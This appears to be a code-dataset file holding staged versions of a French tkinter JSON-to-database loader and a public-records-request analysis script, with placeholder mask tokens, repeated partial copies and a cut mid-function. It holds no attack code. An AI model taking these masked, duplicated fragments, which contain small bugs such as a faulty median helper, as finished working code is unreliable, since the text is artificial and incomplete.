fil.title('Fichier :' + listbox.get(listbox.\n curselection()))\n yscroll = Scrollbar(fil)\n yscroll.pack(side=RIGHT, fill=Y)\n xscroll = Scrollbar(fil, orient=HORIZONTAL)\n xscroll.pack(side=BOTTOM, fill=X)\n text1 = Text(fil, wrap=NONE, height=30, width=100,\n yscrollcommand=yscroll.set, xscrollcommand=\n xscroll.set)\n text1.config(state='normal')\n text1.insert('1.0', textes)\n text1.pack(side=LEFT)\n yscroll.config(command=text1.yview)\n xscroll.config(command=text1.xview)\n fil.mainloop()\n fil.quit()\n except:\n messagebox.showerror(title='Erreur !!!', message=\n 'Vous selectionner un fichier d`abord')\n listbox.grid(row=3, column=0, pady=20)\n btn = Button(self.master, text='Lire Le Fichier', command=selected_item\n )\n btn.grid(row=3, column=1, pady=6)\n <mask token>\n\n def create_widgets(self, mode='Transanction'):\n self.lireFichier()\n self.CaseCocher(mode)\n\n def mains(self, obj):\n obj.master.mainloop()\n obj.db.conn.rollback()\n", "step-3": "<mask token>\n\n\nclass DataLoader:\n\n def __init__(self, master):\n self.anne = {}\n self.master = Toplevel(master)\n master.wait_visibility(self.master)\n self.master.grab_set()\n self.master.minsize(900, 680)\n self.master.resizable(width=False, height=True)\n self.tree = CheckboxTreeview(self.master, height=25)\n os.chdir('DonneJson')\n with open('DonneUtile.json', 'r') as rf:\n self.anne.update(json.load(rf))\n rf.close()\n os.chdir('..')\n self.Nomfichier = os.listdir('DonneJson')\n self.Nomfichier.sort(reverse=True)\n self.modeTransaction = False\n self.db = DbDataloader(self.modeTransaction, self.master)\n self.main()\n\n def main(self):\n choice = messagebox.askyesno('askquestion',\n 'Cliquer sur Oui pour charger les données en mode Trasactionnel')\n if choice:\n self.modeTransaction = True\n self.db.conn.start_transaction()\n self.master.title('Data Loader : Mode Transanction=\\xadOUI')\n self.create_widgets()\n else:\n self.modeTransaction = False\n self.master.title('Data Loader : Mode Transanction=\\xadNON')\n self.create_widgets('Non Transanction')\n\n def lireFichier(self):\n label_welcome1 = Label(self.master, text=\n 'Prévisualiser les données', borderwidth=7, width=40, relief=\n 'groove')\n label_welcome1.grid(row=1, column=0, padx=50)\n label_welcome2 = Label(self.master, text=\n 'Selectionner le fichier pour la lecture')\n label_welcome2.grid(row=2, column=0)\n listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE)\n i = 0\n for fichier in self.Nomfichier:\n if '2' in fichier:\n listbox.insert(i, fichier)\n i = i + 1\n\n def afficherObjet(Obj):\n try:\n os.chdir('DonneJson')\n textFichier = {}\n with open(Obj, 'r') as rf:\n textFichier.update(json.load(rf))\n rf.close()\n if textFichier:\n texte = '{\\n'\n for key, val in textFichier.items():\n b = '\\t{\\n'\n c = '\\t' + str(key) + ' :\\n'\n d = ''\n for key1, val1 in val.items():\n d = str(d) + '\\t\\t' + str(key1) + ' :' + ' ' + str(\n val1) + '\\n'\n e = '\\t},\\n'\n texte = texte + b + c + d + e\n texte = texte + '}\\n'\n texte = texte + '\\n\\n\\t' + str(len(textFichier)\n ) + ' Objets eenregistrer dans le fichier ' + Obj\n os.chdir('..')\n return texte\n except Exception as e:\n print(e)\n messagebox.showerror(title='Erreur !!!', message='Fichier ' +\n Obj + ' introuvable')\n\n def selected_item():\n try:\n if listbox.get(listbox.curselection()):\n textes = afficherObjet(listbox.get(listbox.curselection()))\n if textes:\n fil = Toplevel(self.master)\n self.master.wait_visibility(fil)\n fil.grab_set()\n fil.geometry('600x600')\n fil.title('Fichier :' + listbox.get(listbox.\n curselection()))\n yscroll = Scrollbar(fil)\n yscroll.pack(side=RIGHT, fill=Y)\n xscroll = Scrollbar(fil, orient=HORIZONTAL)\n xscroll.pack(side=BOTTOM, fill=X)\n text1 = Text(fil, wrap=NONE, height=30, width=100,\n yscrollcommand=yscroll.set, xscrollcommand=\n xscroll.set)\n text1.config(state='normal')\n text1.insert('1.0', textes)\n text1.pack(side=LEFT)\n yscroll.config(command=text1.yview)\n xscroll.config(command=text1.xview)\n fil.mainloop()\n fil.quit()\n except:\n messagebox.showerror(title='Erreur !!!', message=\n 'Vous selectionner un fichier d`abord')\n listbox.grid(row=3, column=0, pady=20)\n btn = Button(self.master, text='Lire Le Fichier', command=selected_item\n )\n btn.grid(row=3, column=1, pady=6)\n\n def CaseCocher(self, mode='Transanction'):\n style = Style()\n style.configure('W.TButton', font=('calibri', 15, 'bold',\n 'underline'), foreground='red')\n style.configure('G.TButton', font=('calibri', 15, 'bold',\n 'underline'), foreground='green')\n\n def getCheckDict(obj):\n selectDate = {}\n for t in obj:\n try:\n selectDate[t[:7]].append(t)\n except:\n selectDate[t[:7]] = []\n selectDate[t[:7]].append(t)\n return selectDate\n\n def valider():\n if self.tree.get_checked():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vous etes sur pour la validation')\n if choice == True:\n self.db.Alldayselected = getCheckDict(self.tree.\n get_checked())\n if self.modeTransaction == False:\n self.db.insertCommunique()\n else:\n self.db.insertCommunique()\n else:\n messagebox.showerror(title='Erreur !!!', message=\n 'Cocher une case au moins !!!')\n\n def commit():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vouliez-vouz faire un commit?')\n if choice == True:\n messagebox.showinfo('Info', 'Mode Commit en cours')\n self.db.conn.commit()\n self.db.conn.start_transaction()\n\n def rollback():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vouliez-vouz faire un rollback?')\n if choice == True:\n messagebox.showinfo('Info', 'Mode rollback en cours ')\n self.db.conn.rollback()\n self.db.conn.start_transaction()\n label_welcomec = Label(self.master, text=\n 'La liste des fichiers json obtenus avec leur arborescence',\n borderwidth=7, relief='groove')\n label_welcomec.grid(row=1, column=3, pady=8)\n vsb = Scrollbar(self.master, orient='vertical', command=self.tree.yview\n )\n vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.02)\n self.tree.configure(yscrollcommand=vsb.set)\n self.tree.insert('', 'end', 'ALL', text='SELECT ALL')\n for key, val in self.anne.items():\n self.tree.insert('ALL', 'end', key, text=key)\n for i in val:\n self.tree.insert(key, 'end', i, text=i)\n self.tree.grid(row=3, column=3, pady=2)\n button_name = Button(self.master, text='Valider', command=valider)\n button_name.grid(row=3, column=4, pady=2)\n if mode == 'Transanction':\n commit_buttoon_name = Button(self.master, text='COMMIT',\n command=commit, style='G.TButton')\n commit_buttoon_name.grid(row=4, column=3, pady=2)\n rollback_buttoon_name = Button(self.master, text='ROLLBACK !',\n style='W.TButton', command=rollback)\n rollback_buttoon_name.grid(row=4, column=4, pady=2)\n\n def create_widgets(self, mode='Transanction'):\n self.lireFichier()\n self.CaseCocher(mode)\n\n def mains(self, obj):\n obj.master.mainloop()\n obj.db.conn.rollback()\n", "step-4": "from ttkwidgets import CheckboxTreeview\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import messagebox\nimport json\nimport os\nfrom DbDataloader import *\n\n\nclass DataLoader:\n\n def __init__(self, master):\n self.anne = {}\n self.master = Toplevel(master)\n master.wait_visibility(self.master)\n self.master.grab_set()\n self.master.minsize(900, 680)\n self.master.resizable(width=False, height=True)\n self.tree = CheckboxTreeview(self.master, height=25)\n os.chdir('DonneJson')\n with open('DonneUtile.json', 'r') as rf:\n self.anne.update(json.load(rf))\n rf.close()\n os.chdir('..')\n self.Nomfichier = os.listdir('DonneJson')\n self.Nomfichier.sort(reverse=True)\n self.modeTransaction = False\n self.db = DbDataloader(self.modeTransaction, self.master)\n self.main()\n\n def main(self):\n choice = messagebox.askyesno('askquestion',\n 'Cliquer sur Oui pour charger les données en mode Trasactionnel')\n if choice:\n self.modeTransaction = True\n self.db.conn.start_transaction()\n self.master.title('Data Loader : Mode Transanction=\\xadOUI')\n self.create_widgets()\n else:\n self.modeTransaction = False\n self.master.title('Data Loader : Mode Transanction=\\xadNON')\n self.create_widgets('Non Transanction')\n\n def lireFichier(self):\n label_welcome1 = Label(self.master, text=\n 'Prévisualiser les données', borderwidth=7, width=40, relief=\n 'groove')\n label_welcome1.grid(row=1, column=0, padx=50)\n label_welcome2 = Label(self.master, text=\n 'Selectionner le fichier pour la lecture')\n label_welcome2.grid(row=2, column=0)\n listbox = Listbox(self.master, width=40, height=20, selectmode=SINGLE)\n i = 0\n for fichier in self.Nomfichier:\n if '2' in fichier:\n listbox.insert(i, fichier)\n i = i + 1\n\n def afficherObjet(Obj):\n try:\n os.chdir('DonneJson')\n textFichier = {}\n with open(Obj, 'r') as rf:\n textFichier.update(json.load(rf))\n rf.close()\n if textFichier:\n texte = '{\\n'\n for key, val in textFichier.items():\n b = '\\t{\\n'\n c = '\\t' + str(key) + ' :\\n'\n d = ''\n for key1, val1 in val.items():\n d = str(d) + '\\t\\t' + str(key1) + ' :' + ' ' + str(\n val1) + '\\n'\n e = '\\t},\\n'\n texte = texte + b + c + d + e\n texte = texte + '}\\n'\n texte = texte + '\\n\\n\\t' + str(len(textFichier)\n ) + ' Objets eenregistrer dans le fichier ' + Obj\n os.chdir('..')\n return texte\n except Exception as e:\n print(e)\n messagebox.showerror(title='Erreur !!!', message='Fichier ' +\n Obj + ' introuvable')\n\n def selected_item():\n try:\n if listbox.get(listbox.curselection()):\n textes = afficherObjet(listbox.get(listbox.curselection()))\n if textes:\n fil = Toplevel(self.master)\n self.master.wait_visibility(fil)\n fil.grab_set()\n fil.geometry('600x600')\n fil.title('Fichier :' + listbox.get(listbox.\n curselection()))\n yscroll = Scrollbar(fil)\n yscroll.pack(side=RIGHT, fill=Y)\n xscroll = Scrollbar(fil, orient=HORIZONTAL)\n xscroll.pack(side=BOTTOM, fill=X)\n text1 = Text(fil, wrap=NONE, height=30, width=100,\n yscrollcommand=yscroll.set, xscrollcommand=\n xscroll.set)\n text1.config(state='normal')\n text1.insert('1.0', textes)\n text1.pack(side=LEFT)\n yscroll.config(command=text1.yview)\n xscroll.config(command=text1.xview)\n fil.mainloop()\n fil.quit()\n except:\n messagebox.showerror(title='Erreur !!!', message=\n 'Vous selectionner un fichier d`abord')\n listbox.grid(row=3, column=0, pady=20)\n btn = Button(self.master, text='Lire Le Fichier', command=selected_item\n )\n btn.grid(row=3, column=1, pady=6)\n\n def CaseCocher(self, mode='Transanction'):\n style = Style()\n style.configure('W.TButton', font=('calibri', 15, 'bold',\n 'underline'), foreground='red')\n style.configure('G.TButton', font=('calibri', 15, 'bold',\n 'underline'), foreground='green')\n\n def getCheckDict(obj):\n selectDate = {}\n for t in obj:\n try:\n selectDate[t[:7]].append(t)\n except:\n selectDate[t[:7]] = []\n selectDate[t[:7]].append(t)\n return selectDate\n\n def valider():\n if self.tree.get_checked():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vous etes sur pour la validation')\n if choice == True:\n self.db.Alldayselected = getCheckDict(self.tree.\n get_checked())\n if self.modeTransaction == False:\n self.db.insertCommunique()\n else:\n self.db.insertCommunique()\n else:\n messagebox.showerror(title='Erreur !!!', message=\n 'Cocher une case au moins !!!')\n\n def commit():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vouliez-vouz faire un commit?')\n if choice == True:\n messagebox.showinfo('Info', 'Mode Commit en cours')\n self.db.conn.commit()\n self.db.conn.start_transaction()\n\n def rollback():\n choice = messagebox.askyesno('Askquestion!!!',\n 'Vouliez-vouz faire un rollback?')\n if choice == True:\n messagebox.showinfo('Info', 'Mode rollback en cours ')\n self.db.conn.rollback()\n self.db.conn.start_transaction()\n label_welcomec = Label(self.master, text=\n 'La liste des fichiers json obtenus avec leur arborescence',\n borderwidth=7, relief='groove')\n label_welcomec.grid(row=1, column=3, pady=8)\n vsb = Scrollbar(self.master, orient='vertical', command=self.tree.yview\n )\n vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.02)\n self.tree.configure(yscrollcommand=vsb.set)\n self.tree.insert('', 'end', 'ALL', text='SELECT ALL')\n for key, val in self.anne.items():\n self.tree.insert('ALL', 'end', key, text=key)\n for i in val:\n self.tree.insert(key, 'end', i, text=i)\n self.tree.grid(row=3, column=3, pady=2)\n button_name = Button(self.master, text='Valider', command=valider)\n button_name.grid(row=3, column=4, pady=2)\n if mode == 'Transanction':\n commit_buttoon_name = Button(self.master, text='COMMIT',\n command=commit, style='G.TButton')\n commit_buttoon_name.grid(row=4, column=3, pady=2)\n rollback_buttoon_name = Button(self.master, text='ROLLBACK !',\n style='W.TButton', command=rollback)\n rollback_buttoon_name.grid(row=4, column=4, pady=2)\n\n def create_widgets(self, mode='Transanction'):\n self.lireFichier()\n self.CaseCocher(mode)\n\n def mains(self, obj):\n obj.master.mainloop()\n obj.db.conn.rollback()\n", "step-5": "from ttkwidgets import CheckboxTreeview\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import messagebox\nimport json\nimport os\nfrom DbDataloader import *\nclass DataLoader():\n def __init__(self,master):\n self.anne={}\n self.master=Toplevel(master)\n master.wait_visibility(self.master)\n self.master.grab_set()\n self.master.minsize(900,680)\n self.master.resizable(width=False,height=True)\n self.tree = CheckboxTreeview(self.master,height=25)\n os.chdir(\"DonneJson\")\n with open(\"DonneUtile.json\",\"r\") as rf:\n self.anne.update(json.load(rf))\n rf.close()\n os.chdir(\"..\")\n self.Nomfichier=os.listdir(\"DonneJson\")\n self.Nomfichier.sort(reverse=True)\n self.modeTransaction=False\n self.db=DbDataloader(self.modeTransaction,self.master)\n self.main()\n #Fonction pour lire les fichiers json deja dans le module DataAcquisition\n def main(self):\n choice= messagebox.askyesno(\"askquestion\",\"Cliquer sur Oui pour charger les données en mode Trasactionnel\")\n if choice :\n self.modeTransaction=True\n self.db.conn.start_transaction()\n self.master.title(\"Data Loader : Mode Transanction=­OUI\")\n self.create_widgets()\n else:\n self.modeTransaction=False\n self.master.title(\"Data Loader : Mode Transanction=­NON\")\n self.create_widgets(\"Non Transanction\")\n def lireFichier(self):\n label_welcome1 = Label(self.master,text=\"Prévisualiser les données\",\n borderwidth = 7,\n width = 40,\n relief=\"groove\"\n )\n label_welcome1.grid(row = 1, column = 0, padx = 50)\n label_welcome2 = Label(self.master,text=\"Selectionner le fichier pour la lecture\")\n label_welcome2.grid(row = 2, column = 0, )\n listbox = Listbox(self.master, width=40, height=20,selectmode=SINGLE)\n i=0\n for fichier in self.Nomfichier:\n if \"2\" in fichier:\n listbox.insert(i, fichier)\n i=i+1\n def afficherObjet(Obj):\n try:\n os.chdir(\"DonneJson\")\n textFichier={}\n with open(Obj,\"r\") as rf:\n textFichier.update(json.load(rf))\n rf.close() \n if textFichier:\n texte=\"{\\n\"\n for key,val in textFichier.items():\n b =\"\\t{\\n\"\n c=\"\\t\"+str(key)+\" :\\n\"\n d=\"\"\n for key1,val1 in val.items():\n d=str(d)+\"\\t\\t\"+str(key1)+\" :\"+\" \"+str(val1)+\"\\n\"\n e=\"\\t},\\n\"\n texte=texte+b+c+d+e\n texte=texte+\"}\\n\"\n texte=texte+\"\\n\\n\\t\"+str(len(textFichier))+\" Objets eenregistrer dans le fichier \"+Obj \n os.chdir(\"..\")\n return texte\n except Exception as e:\n print(e)\n messagebox.showerror(title=\"Erreur !!!\", message=\"Fichier \"+Obj+\" introuvable\")\n def selected_item():\n try:\n if listbox.get(listbox.curselection()):\n textes=afficherObjet(listbox.get(listbox.curselection()))\n if textes:\n fil = Toplevel(self.master)\n # fenetre blocante : empeche l’ouverture de fenetres identiques\n self.master.wait_visibility(fil)\n fil.grab_set()\n # end fenetre blocante\n fil.geometry(\"600x600\")\n fil.title(\"Fichier :\"+listbox.get(listbox.curselection()))\n yscroll = Scrollbar(fil)\n yscroll.pack(side=RIGHT, fill=Y)\n xscroll = Scrollbar(fil, orient=HORIZONTAL)\n xscroll.pack(side=BOTTOM, fill=X)\n text1 = Text(fil,wrap=NONE,height=30, width=100,yscrollcommand=yscroll.set,\n xscrollcommand=xscroll.set) \n text1.config(state=\"normal\")\n text1.insert(\"1.0\",textes) \n text1.pack(side=LEFT) \n yscroll.config(command=text1.yview) \n xscroll.config(command=text1.xview) \n fil.mainloop()\n fil.quit()\n except :\n messagebox.showerror(title=\"Erreur !!!\", message=\"Vous selectionner un fichier d`abord\")\n listbox.grid(row = 3, column = 0, pady =20 )\n btn = Button(self.master, text='Lire Le Fichier', command=selected_item)\n btn.grid(row = 3, column = 1, pady =6 )\n #Fonction pour cocher les dates ensuite enregistrer vers la bases de donneef\n def CaseCocher(self,mode=\"Transanction\"): \n style = Style() \n style.configure('W.TButton', font =\n ('calibri', 15, 'bold', 'underline'),\n foreground = 'red')\n style.configure('G.TButton', font =\n ('calibri', 15, 'bold','underline'),\n foreground = 'green')\n #recuperer les ligne selectionnes \n def getCheckDict(obj):\n selectDate={}\n for t in obj:\n try:\n selectDate[t[:7]].append(t)\n except:\n selectDate[t[:7]]=[]\n selectDate[t[:7]].append(t)\n return selectDate\n def valider():\n if self.tree.get_checked():\n #si il choisi oui (en transanction)\n choice= messagebox.askyesno(\"Askquestion!!!\",\"Vous etes sur pour la validation\")\n if choice==True:\n self.db.Alldayselected =getCheckDict(self.tree.get_checked())\n if self.modeTransaction == False:\n #Mode Non Transactionnel\n self.db.insertCommunique()\n else:\n #Mode Transaction\n self.db.insertCommunique() \n else:\n messagebox.showerror(title=\"Erreur !!!\", message=\"Cocher une case au moins !!!\")\n def commit():\n choice= messagebox.askyesno(\"Askquestion!!!\",\"Vouliez-vouz faire un commit?\")\n if choice==True:\n messagebox.showinfo(\"Info\",\"Mode Commit en cours\")\n self.db.conn.commit()\n self.db.conn.start_transaction()\n def rollback():\n choice= messagebox.askyesno(\"Askquestion!!!\",\"Vouliez-vouz faire un rollback?\")\n if choice==True:\n messagebox.showinfo(\"Info\",\"Mode rollback en cours \")\n self.db.conn.rollback()\n self.db.conn.start_transaction()\n label_welcomec = Label(self.master,\n text=\"La liste des fichiers json obtenus avec leur arborescence\",\n borderwidth = 7,\n relief=\"groove\")\n label_welcomec.grid(row = 1, column = 3, pady = 8)\n vsb = Scrollbar(self.master, orient=\"vertical\", command=self.tree.yview)\n vsb.place(relx=0.978, rely=0.175, relheight=0.713, relwidth=0.020)\n self.tree.configure(yscrollcommand=vsb.set)\n self.tree.insert(\"\", \"end\", \"ALL\", text=\"SELECT ALL\")\n for key,val in self.anne.items():\n self.tree.insert(\"ALL\", \"end\", key, text=key)\n for i in val:\n self.tree.insert(key,\"end\", i, text=i)\n self.tree.grid(row = 3, column = 3, pady = 2)\n button_name=Button(self.master,text=\"Valider\",command=valider)\n button_name.grid(row = 3, column = 4, pady = 2)\n if mode==\"Transanction\":\n commit_buttoon_name=Button(self.master,text=\"COMMIT\",command=commit,style=\"G.TButton\"\n )\n commit_buttoon_name.grid(row = 4, column = 3, pady = 2)\n rollback_buttoon_name=Button(self.master, text = 'ROLLBACK !',\n style = 'W.TButton',command=rollback)\n rollback_buttoon_name.grid(row = 4, column = 4, pady = 2)\n def create_widgets(self,mode=\"Transanction\"):\n self.lireFichier()\n self.CaseCocher(mode)\n def mains(self,obj):\n obj.master.mainloop()\n obj.db.conn.rollback()\n", "step-ids": [ 5, 6, 7, 8, 9 ] }
[ 5, 6, 7, 8, 9 ]
<|reserved_special_token_0|> def freqHist3(tbl): """python3 version ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order """ from functools import cmp_to_key def cmpd1(a, b): """decreasing order of frequencies""" return b[1] - a[1] flist = list(tbl.items()) flist.sort(key=cmp_to_key(cmpd1)) return flist <|reserved_special_token_0|> def bldIndexTblCSV(inf, startDate=None): """return prrIDTbl, deptTbl """ prrTbl = {} deptTbl = defaultdict(list) statusTbl = defaultdict(int) ncloseDate = 0 nolder = 0 nmultDept = 0 deptSepChar = b'\xef\xbf\xbd' reader = csv.DictReader(open(inf, encoding='utf8', errors='replace')) for i, entry in enumerate(reader): prr = {} prrID = entry['Id'] createDateStr = entry['Created At'].strip() prr['createDate'] = datetime.datetime.strptime(createDateStr, CSVDTFormat) if createDateStr != '' else None if prr['createDate'] == None or startDate != None and prr['createDate' ] < startDate: nolder += 1 continue deptStr = entry['Departments'].strip() if deptStr.find(';') == -1: deptList = [deptStr] else: nmultDept += 1 deptList = [dept.strip() for dept in deptStr.split(';')] deptList2 = [] for dept in deptList: ndept = DeptNorm[dept] if dept in DeptNorm else dept if ndept != '': deptList2.append(ndept) deptTbl[ndept].append(prrID) prr['dept'] = deptList2 closeDateStr = entry['Closed Date'].strip() prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat ) if closeDateStr != '' else None prr['status'] = entry['Status'].strip() prr['text'] = entry['Request Text'].strip() prr['closeReason'] = entry['Closure Reasons'].strip() prr['URL'] = entry['URL'].strip() statusTbl[prr['status']] += 1 if prr['closeDate'] != None: ncloseDate += 1 prrTbl[prrID] = prr print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % ( len(prrTbl), len(deptTbl), nmultDept, ncloseDate)) if startDate != None: print('bldIndexTblCSV: NOld dropped=%d' % nolder) freqList = freqHist3(statusTbl) print('Status,Freq') for status, freq in freqList: print('"%s",%d' % (status, freq)) return prrTbl, deptTbl def compHistAvg(hist): """compute first moment ASSUME hist: value -> freq """ sum = n = 0 for v in hist.keys(): n += hist[v] sum += v * hist[v] return n, float(sum) / n def compMedian(hist): """compute MEDIAN value ASSUME hist: value -> freq """ if len(hist) == 1: return hist[0] sum = n = 0 vn = {} for v in sorted(hist.keys()): n += hist[v] sum += v * hist[v] vn[v] = n half = float(n / 2.0) for v in sorted(hist.keys()): if vn[v] > half: return v def anlyzCreateDates(prrIDTbl, outf): """distribution of create dates """ dateDist = defaultdict(int) nmissdate = 0 for prrID, prr in prrIDTbl.items(): cdateFnd = prr['createDate'] if cdateFnd == None: nmissdate += 1 continue mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month) dateDist[mkey] += 1 print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate)) allMon = list(dateDist.keys()) allMon.sort() outs = open(outf, 'w') outs.write('Month,Freq\n') for mkey in allMon: outs.write('%s,%d\n' % (mkey, dateDist[mkey])) outs.close() def normDeptName(dept): return re.sub('\\W', '_', dept.upper()) def anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10): """Compute average (over previous 90 days) number of days to respond to request Number requests open at month start """ allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq] allDept.sort() nonOPDresp = defaultdict(lambda : defaultdict(int)) nonOPDopen = defaultdict(int) print('\n# Dept,NOld,NMissRecd,NMissClose') missCloseDetails = defaultdict(lambda : defaultdict(list)) for dept in allDept: responseMon = defaultdict(lambda : defaultdict(int)) openReqMon = defaultdict(int) nmissRecd = 0 nmissClose = 0 nolder = 0 for prrID in deptTbl[dept]: prr = prrIDTbl[prrID] recdDateTime = prr['createDate'] if recdDateTime == None: nmissRecd += 1 continue if recdDateTime < startDate: nolder += 1 continue try: recdMonKey = '%d-%02d' % (recdDateTime.year, recdDateTime.month ) except Exception as e: print('huh') if prr['status'] == 'Closed': closeDate = prr['closeDate'] if closeDate == None: nmissClose += 1 missCloseDetails[dept][recdMonKey].append(prrID) continue respDelay = closeDate - recdDateTime delayDays = respDelay.days responseMon[recdMonKey][delayDays] += 1 if dept != 'Police Department': nonOPDresp[recdMonKey][delayDays] += 1 else: openReqMon[recdMonKey] += 1 if dept != 'Police Department': nonOPDopen[recdMonKey] += 1 print('"%s",%d,%d,%d' % (dept, nolder, nmissRecd, nmissClose)) allMonth = list(responseMon.keys()) allMonth.sort() normDept = normDeptName(dept) outf = outdir + normDept + '-RT.csv' outs = open(outf, 'w') outs.write('Month,NClose,NOpen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(responseMon[recdMonKey]) medianDelay = compMedian(responseMon[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, openReqMon[ recdMonKey], avgDelay, medianDelay)) outs.close() allMonth = list(nonOPDresp.keys()) allMonth.sort() outf = outdir + 'NonOPD-RT.csv' outs = open(outf, 'w') outs.write('Month,N,NOPen,Avg,Median\n') for recdMonKey in allMonth: nreq, avgDelay = compHistAvg(nonOPDresp[recdMonKey]) medianDelay = compMedian(nonOPDresp[recdMonKey]) outs.write('%s,%d,%d,%f,%d\n' % (recdMonKey, nreq, nonOPDopen[ recdMonKey], avgDelay, medianDelay)) outs.close() outf = outdir + 'missClose.csv' outs = open(outf, 'w') allDateSet = set() for dept in missCloseDetails.keys(): allDateSet.update(missCloseDetails[dept].keys()) allDates = sorted(list(allDateSet)) hdr = 'Dept' for date in allDates: hdr += ',%s' % (date,) outs.write(hdr + '\n') for dept in sorted(missCloseDetails.keys()): line = dept for date in allDates: if date in missCloseDetails[dept]: line += ',%d' % (len(missCloseDetails[dept][date]),) else: line += ', ' outs.write(line + '\n') outs.close() <|reserved_special_token_0|> def getWebPages(prrTbl, outf): outs = open(outf, 'w') outs.write('PRRID,OPD,Text\n') nempty = 0 npdf = 0 for i, prrID in enumerate(sorted(prrTbl.keys())): prr = prrTbl[prrID] if prr['URL'] == '': nempty += 1 continue opdP = 'Police Department' in prr['dept'] url = prr['URL'] response = urllib.request.urlopen(url) webContentBytes = response.read() webContent = webContentBytes.decode('utf-8') if webContent.find('pdf') != -1: print('here') npdf += 1 else: continue if i % 100 == 0: print(i, npdf, nempty) outs.close() print('prr20-text: NPRR=%d NEmpty=%d' % (len(prrTbl), nempty)) def loadPRRQuery(inf): reader = csv.DictReader(open(inf)) prrIDList = [] for i, entry in enumerate(reader): prrIDList.append(entry['PRRId'].strip()) return prrIDList def rptQry(qryList, outf): outs = open(outf, 'w') outs.write('PRID,CreateDate,DaysOpen,Status\n') runDate = datetime.datetime.today() for prrID in qryList: prr = prr20Recent[prrID] recdDateTime = prr['createDate'] openPeriod = runDate - recdDateTime openDays = openPeriod.days outs.write('%s,%s,%d,%s\n' % (prrID, prr['createDate'].date(), openDays, prr['status'])) outs.close() <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def freqHist3(tbl): """python3 version ASSUME: values are frequencies, returns sorted list of (val,freq) items in descending freq order """ from functools import cmp_to_key def cmpd1(a, b): """decreasing order of frequencies""" return b[1] - a[1] flist = list(tbl.items()) flist.sort(key=cmp_to_key(cmpd1)) return flist <|reserved_special_token_0|> def bldIndexTblCSV(inf, startDate=None): """return prrIDTbl, deptTbl """ prrTbl = {} deptTbl = defaultdict(list) statusTbl = defaultdict(int) ncloseDate = 0 nolder = 0 nmultDept = 0 deptSepChar = b'\xef\xbf\xbd' reader = csv.DictReader(open(inf, encoding='utf8', errors='replace')) for i, entry in enumerate(reader): prr = {} prrID = entry['Id'] createDateStr = entry['Created At'].strip() prr['createDate'] = datetime.datetime.strptime(createDateStr, CSVDTFormat) if createDateStr != '' else None if prr['createDate'] == None or startDate != None and prr['createDate' ] < startDate: nolder += 1 continue deptStr = entry['Departments'].strip() if deptStr.find(';') == -1: deptList = [deptStr] else: nmultDept += 1 deptList = [dept.strip() for dept in deptStr.split(';')] deptList2 = [] for dept in deptList: ndept = DeptNorm[dept] if dept in DeptNorm else dept if ndept != '': deptList2.append(ndept) deptTbl[ndept].append(prrID) prr['dept'] = deptList2 closeDateStr = entry['Closed Date'].strip() prr['closeDate'] = datetime.datetime.strptime(closeDateStr, CSVDTFormat ) if closeDateStr != '' else None prr['status'] = entry['Status'].strip() prr['text'] = entry['Request Text'].strip() prr['closeReason'] = entry['Closure Reasons'].strip() prr['URL'] = entry['URL'].strip() statusTbl[prr['status']] += 1 if prr['closeDate'] != None: ncloseDate += 1 prrTbl[prrID] = prr print('bldIndexTblCSV: NPRR=%d NDept=%d NMultDept=%d NCloseDate=%d' % ( len(prrTbl), len(deptTbl), nmultDept, ncloseDate)) if startDate != None: print('bldIndexTblCSV: NOld dropped=%d' % nolder) freqList = freqHist3(statusTbl) print('Status,Freq') for status, freq in freqList: print('"%s",%d' % (status, freq)) return prrTbl, deptTbl def compHistAvg(hist): """compute first moment ASSUME hist: value -> freq """ sum = n = 0 for v in hist.keys(): n += hist[v] sum += v * hist[v] return n, float(sum) / n def compMedian(hist): """compute MEDIAN value ASSUME hist: value -> freq """ if len(hist) == 1: return hist[0] sum = n = 0 vn = {} for v in sorted(hist.keys()): n += hist[v] sum += v * hist[v] vn[v] = n half = float(n / 2.0) for v in sorted(hist.keys()): if vn[v] > half: return v def anlyzCreateDates(prrIDTbl, outf): """distribution of create dates """ dateDist = defaultdict(int) nmissdate = 0 for prrID, prr in prrIDTbl.items(): cdateFnd = prr['createDate'] if cdateFnd == None: nmissdate += 1 continue mkey = '%d-%02d' % (cdateFnd.year, cdateFnd.month) dateDist[mkey] += 1 print('anlyzCreateDates: NPRR=%d NBadDate=%d' % (len(prrIDTbl), nmissdate)) allMon = list(dateDist.keys()) allMon.sort() outs = open(outf, 'w') outs.write('Month,Freq\n') for mkey in allMon: outs.write('%s,%d\n' % (mkey, dateDist[mkey])) outs.close() def normDeptName(dept): return re.sub('\\W', '_', dept.upper()) def anlyzClearDates(prrIDTbl, deptTbl, startDate, outdir, minDeptFreq=10): """Compute average (over previous 90 days) number of days to respond to request Number requests open at month start """ allDept = [dept for dept in deptTbl.keys() if len(deptTbl[dept]) > minDeptFreq] allDept.sort() nonOPDresp = defaultdict(lambda : defaultdict(int)) nonOPDopen = defaultdict(int) print('\n# Dept,NOld,NMissRecd,NMissClose') missCloseDetails = defaultdict(lambda : defaultdict(list)) for dept in allDept: responseMon = defaultdict(lambda : defaultdict(int)) openReqMon = defaultdict(int) nmissRecd = 0 nmissClose = 0 nolder = 0 for prrID in deptTbl[dept]: prr = prrIDTbl[prrID] recdDateTime = prr['createDate'] if recdDateTime == None: nmissRecd += 1 continue if recdDateTime < startDate: nolder += 1 continue try: 